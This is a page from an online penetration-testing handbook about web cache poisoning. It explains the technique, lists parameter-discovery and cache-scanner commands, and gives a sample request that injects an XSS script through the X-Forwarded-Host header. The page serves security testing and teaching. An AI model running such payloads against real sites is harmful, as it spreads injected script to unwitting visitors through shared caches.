Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
Root domains
Subdomain Enum
Webs recon
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
General Info
Quick tricks
Header injections
Bruteforcing
Online hashes cracked
Crawl/Fuzz
LFI/RFI
File upload
SQLi
SSRF
Open redirects
XSS
CSP
XXE
Cookie Padding
Webshells
CORS
CSRF
Web Cache Poisoning
Broken Links
Clickjacking
HTTP Request Smuggling
Web Sockets
CRLF
IDOR
Web Cache Deception
Session fixation
Email attacks
Pastejacking
HTTP Parameter pollution
SSTI
Prototype Pollution
Command Injection
Deserialization
DNS rebinding
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
Web Cache Poisoning

General

Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.
Fundamentally, web cache poisoning involves two phases. First, the attacker must work out how to elicit a response from the back-end server that inadvertently contains some kind of dangerous payload. Once successful, they need to make sure that their response is cached and subsequently served to the intended victims.
A poisoned web cache can potentially be a devastating means of distributing numerous different attacks, exploiting vulnerabilities such as XSS, JavaScript injection, open redirection, and so on.

Tools

1
# https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
2
wcvs -u https://url.com
3
# https://github.com/s0md3v/Arjun
4
python3 arjun.py -u https://url.com --get
5
python3 arjun.py -u https://url.com --post
6
# https://github.com/maK-/parameth
7
python parameth.py -u https://example.com/test.php
8
# https://github.com/devanshbatham/ParamSpider
9
python3 paramspider.py --domain example.com
10
# https://github.com/s0md3v/Parth
11
python3 parth.py -t example.com
Copied!
1
# XSS for users accessing /en?region=uk:
2
GET /en?region=uk HTTP/1.1
3
Host: innocent-website.com
4
X-Forwarded-Host: a."><script>alert(1)</script>"
Copied!
Previous
CSRF
Next
Broken Links
Last modified 9d ago
Export as PDF
Copy link
Edit on GitHub
Contents
General
Tools